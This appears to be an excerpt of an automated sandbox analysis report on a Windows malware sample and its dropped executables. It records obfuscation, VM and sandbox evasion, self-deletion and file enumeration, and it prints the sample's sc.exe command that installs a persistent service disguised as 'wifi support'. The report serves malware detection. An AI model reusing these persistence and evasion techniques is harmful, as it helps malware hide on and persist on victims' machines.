                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 5_2_00603C66 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 5_2_00603C01 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 5_2_00613634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0047127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0047123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0047735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_004753C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_0041A514 push eax; retn 0054h
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_0041A39C pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020B5C53 push ss; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020B128B push ebx; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020B3EE0 pushad ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020B4941 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020B4973 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: 8_2_020E3C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Code function: 13_2_002C8508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Code function: 13_2_002C764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Code function: 13_2_00D14003 push esi; retf
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00409CAE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: 1365.exe.3.dr Static PE information: 0xA029C1CD [Wed Feb 24 14:12:29 2055 UTC]
                      Source: 4ED.exe.3.dr Static PE information: section name: .7m512qw
                      Source: 28B3.exe.3.dr Static PE information: section name: .didat
                      Source: 2941.exe.3.drStatic PE information: section name: .code
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .edata
                      Source: initial sampleStatic PE information: section name: .edata entropy: 7.99737439266
                      Source: 768F.exe.3.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                      Persistence and Installation Behavior:

                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown | Executable created and started: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vsiicvb
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\4ED.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\6902.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2941.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2D5.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\vsiicvb
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1365.exe
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | File created: C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FF1A.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\76E7.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E6AF.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\28B3.exe
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\7CCD.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Code function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      Deletes itself after installation
                      Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\v91yw08j6p.exe
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\adiicvb:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Process information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      Found evasive API chain (may stop execution after checking mutex)
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to evade analysis by executing a special instruction which causes a usermode exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000C96396 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000C9686E instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000C9EAE0 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000C9ECD4 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000CA47F2 instructions 0F0B caused by: Known instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000CA4976 instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                      Source: C:\Users\user\AppData\Local\Temp\1365.exe | Special instruction interceptor: First address: 0000000000C9D7F3 instructions 0F0B caused by: Known instruction #UD exception
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\adiicvb | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D6CF0
                      Found evasive API chain (may stop execution after checking computer name)
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe TID: 6480 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 579
                      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 441
                      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 407
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe | API coverage: 9.3 %
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | API coverage: 6.3 %
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | API coverage: 9.3 %
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe | API coverage: 4.1 %
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D6CF0
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | API call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000003.00000000.693686948.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.689902002.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.693686948.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
                      Source: explorer.exe, 00000003.00000000.687377926.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe | Code function: 11_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe | Code function: 8_2_020D9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
